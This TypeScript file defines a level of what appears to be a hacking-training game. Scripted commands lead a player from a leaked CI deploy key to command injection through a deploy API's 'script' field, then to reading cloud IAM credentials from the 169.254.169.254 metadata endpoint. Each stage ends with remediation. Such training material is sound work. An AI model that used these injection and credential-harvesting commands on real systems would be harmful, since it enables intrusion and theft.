import type { ChainDef } from "../../types";
import { match, cmd } from "../../engine";
import { jitteredCoords } from "../../../state-coords";

const IP_ASHCROFT = "203.0.113.152";
const IP_CORRELL = "203.0.113.153";
const DEPLOY_KEY = "bf_deploy_9e21ac04f7";

export const campaignLevel2: ChainDef = {
  id: "campaign-2",
  difficulty: "campaign",
  order: 2,
  points: 240,
  title: "Supply Chain",
  codename: "CAMPAIGN — EPISODE 2: SUPPLY CHAIN",
  summary: "The directory named a managed-IT contractor. Every subsidiary that trusts Ashcroft's deploy pipeline trusts whatever's leaking out of it.",
  briefing: [
    "unbank's read: Concord Financial Group doesn't run its own infrastructure — it contracts a",
    "managed-IT shop, Ashcroft Managed IT, to deploy and maintain systems across a chunk of the",
    "subsidiary stack. A vendor everyone trusts and nobody audits is exactly the seam worth finding.",
    "",
    "No leaked credential to start this one. Just a build pipeline, probably public, probably careless.",
  ],
  debrief: [
    "A CI/CD dashboard left public leaked a deploy key straight out of a build log — nobody scrubs logs",
    "as carefully as they scrub the code that generates them. That one key was trusted by a specific",
    "subsidiary's deploy hook, which ran whatever it was told to as part of a routine release.",
    "",
    "One vendor's careless logging became code execution inside a subsidiary two hops removed from",
    "anyone who signs Ashcroft's contract.",
  ],
  nodes: [
    {
      id: "ashcroft",
      org: "Ashcroft Managed IT",
      city: "Larkin",
      state: "KS",
      coords: jitteredCoords("KS", "campaign-2:ashcroft"),
      ip: IP_ASHCROFT,
      tagline: "Contracted managed-IT vendor for a segment of Concord's subsidiary stack",
      briefing: [
        `TARGET: Ashcroft Managed IT — build pipeline — ${IP_ASHCROFT}`,
        "No known credentials. Start with what's public.",
        "",
        "Find out whether their CI/CD dashboard is actually locked down, or just assumed to be.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Locate the public CI/CD dashboard", tactic: "Discovery", requires: ["recon"] },
        { id: "enum", label: "Enumerate build jobs visible without authentication", tactic: "Discovery", requires: ["identify"] },
        { id: "loot", label: "Recover a hardcoded deploy key from a public build log", tactic: "Credential Access", requires: ["enum"] },
        { id: "secure", label: "Lock down the dashboard and rotate the leaked deploy key", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`. A build/CI tool usually runs on its own port, separate from any marketing site.",
        "If the dashboard needs no login at all, list its jobs — `curl http://<ip>/jobs`.",
        "One of those jobs deploys to a named subsidiary. Read its most recent build log — deploy scripts print the credentials they use far more often than anyone intends.",
      ],
      debrief: [
        "root cause: the BuildForge CI dashboard required no authentication to view job listings or build",
        "logs, and a deploy script printed its own API key to stdout on every run — CWE-532 (information",
        "exposure through log files), compounded by a completely unauthenticated dashboard.",
        "fix applied: dashboard access restricted, deploy scripts stopped echoing secrets, the leaked key rotated.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP_ASHCROFT],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "80/tcp   open  http    nginx 1.24.0 (marketing site)",
              "8090/tcp open  http    BuildForge CI 4.1 (undocumented)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.10 seconds",
            ],
          }),
        }),
        cmd({
          id: "curl-ci",
          tool: "curl",
          requires: ["8090"],
          forbids: ["jobs"],
          help: "curl http://<ip>:8090      — probe the CI dashboard",
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["found_ci"],
            output: [
              '{"service":"buildforge","version":"4.1","auth":"none","jobs_endpoint":"/jobs"}',
              "",
              "note: 'auth: none' on a CI dashboard that deploys real infrastructure is worth a second look.",
            ],
          }),
        }),
        cmd({
          id: "list-jobs",
          tool: "curl",
          requires: ["8090", "jobs"],
          forbids: ["correll-data-deploy/log"],
          help: "curl http://<ip>:8090/jobs",
          requiresFlags: ["found_ci"],
          run: () => ({
            completesObjective: "enum",
            tone: "success",
            setsFlags: ["have_jobs"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '[{"name":"ashcroft-marketing-deploy","last_run":"passed"},',
              ' {"name":"correll-data-deploy","last_run":"passed"},',
              ' {"name":"bellwether-portal-deploy","last_run":"passed"}]',
              "",
              "note: correll-data-deploy is worth a closer look — 'Correll Data Systems' isn't a name",
              "you've seen yet.",
            ],
          }),
        }),
        cmd({
          id: "read-log",
          tool: "curl",
          requires: ["correll-data-deploy/log"],
          help: "curl http://<ip>:8090/jobs/correll-data-deploy/log",
          requiresFlags: ["have_jobs"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            setsFlags: ["have_deploy_key"],
            note: `Ashcroft Managed IT build log — Correll Data Systems deploy key: ${DEPLOY_KEY} (reachable at ${IP_CORRELL})`,
            output: [
              "HTTP/1.1 200 OK",
              "",
              "[12:04:01] cloning correll-data/infra ...",
              `[12:04:03] deploying with DEPLOY_KEY=${DEPLOY_KEY}`,
              `[12:04:04] POST https://${IP_CORRELL}/api/deploy/trigger — 200 OK`,
              "[12:04:05] deploy complete.",
              "",
              "[+] a live deploy key, printed in plaintext, in a log anyone with the dashboard URL can read.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm what the build log actually leaks before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] restricted the BuildForge dashboard to authenticated staff",
              "[+] removed credential echoing from every deploy script",
              "[+] rotated the leaked Correll Data Systems deploy key",
              "",
              "ASHCROFT MANAGED IT: SECURED",
            ],
          }),
        },
      ],
    },
    {
      id: "correll",
      org: "Correll Data Systems",
      city: "Larkin",
      state: "MN",
      coords: jitteredCoords("MN", "campaign-2:correll"),
      ip: IP_CORRELL,
      tagline: "Debt-tape data warehousing subsidiary",
      briefing: [
        `TARGET: Correll Data Systems — deploy API — ${IP_CORRELL}`,
        `YOU HAVE: a live deploy key leaked from Ashcroft's build log — ${DEPLOY_KEY}`,
        "",
        "Find out exactly what that key is trusted to run.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "auth", label: "Authenticate to the deploy API with the leaked key", tactic: "Initial Access", requires: ["recon"] },
        { id: "foothold", label: "Trigger a deploy hook to achieve command execution", tactic: "Execution", requires: ["auth"] },
        { id: "loot", label: "Recover the cloud IAM role this host runs as", tactic: "Collection", requires: ["foothold"] },
        { id: "secure", label: "Revoke the deploy key and scope the deploy hook's command surface", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`.",
        `Authenticate to the deploy API's trigger endpoint with the key from Ashcroft's log — \`curl -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/trigger\`.`,
        `The trigger endpoint accepts a 'script' field it runs as part of the deploy — that's not a config value, that's command execution with extra steps: \`curl -X POST -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/trigger -d "script=id"\`.`,
        `Once you have execution, check what cloud role this host is running as — same trick as always: \`curl -X POST -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/trigger -d "script=curl 169.254.169.254/latest/meta-data/iam/security-credentials/"\`.`,
      ],
      debrief: [
        "root cause: the deploy API trusted any request bearing a valid deploy key to specify an arbitrary",
        "'script' value that ran verbatim as part of the deploy — the key was meant to authorize a fixed",
        "pipeline, not arbitrary commands (CWE-94, code injection via a trusted automation surface).",
        "fix applied: the deploy key was revoked, the deploy hook now only runs a fixed, signed script.",
        "",
        "CORRELL DATA SYSTEMS: SECURED.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP_CORRELL],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT    STATE SERVICE VERSION",
              "443/tcp open  https   nginx 1.24.0 (deploy API)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 3.85 seconds",
            ],
          }),
        }),
        cmd({
          id: "auth-deploy",
          tool: "curl",
          requires: ["x-deploy-key", DEPLOY_KEY, "api/deploy/status"],
          forbids: ["trigger"],
          help: `curl -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/status`,
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "auth",
            tone: "success",
            setsFlags: ["authed"],
            output: [
              '{"status":"idle","last_deploy":"ashcroft-managed-it CI, 2 days ago"}',
              "",
              "response header: X-Deploy-Trigger: /api/deploy/trigger (accepts POST script=)",
            ],
          }),
        }),
        cmd({
          id: "trigger-exec",
          tool: "curl",
          requires: ["deploy/trigger", "script=", "id"],
          help: `curl -X POST -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/trigger -d "script=id"`,
          requiresFlags: ["authed"],
          run: () => ({
            completesObjective: "foothold",
            tone: "success",
            setsFlags: ["have_exec"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"output":"uid=1000(svc_correll) gid=1000(svc_correll) groups=1000(svc_correll)"}',
              "",
              "[+] the deploy hook ran whatever was in 'script' — that's not a deploy parameter, it's",
              "    arbitrary command execution.",
            ],
          }),
        }),
        cmd({
          id: "loot-role",
          tool: "curl",
          requires: ["deploy/trigger", "script=", "169.254.169.254", "iam"],
          help: `curl -X POST -H "X-Deploy-Key: ${DEPLOY_KEY}" https://<ip>/api/deploy/trigger -d "script=curl 169.254.169.254/latest/meta-data/iam/security-credentials/"`,
          requiresFlags: ["have_exec"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Correll Data Systems host runs as IAM role correll-data-svc — trusted broadly across Concord's contracted cloud/SaaS estate",
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"output":"correll-data-svc"}',
              "",
              "[+] this deploy host's own cloud role — correll-data-svc. worth remembering the name; a role",
              "    this broadly trusted rarely stays contained to one subsidiary's account.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm what this host's role actually reaches before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            setsFlags: ["ep2_complete"],
            output: [
              "[+] revoked the leaked deploy key",
              "[+] scoped the deploy hook to a fixed, signed script — no free-form 'script' field",
              "[+] flagged correll-data-svc's IAM trust scope for follow-up review",
              "",
              "CORRELL DATA SYSTEMS: SECURED",
              "",
              "=== EPISODE 2 COMPLETE ===",
            ],
          }),
        },
      ],
    },
  ],
};
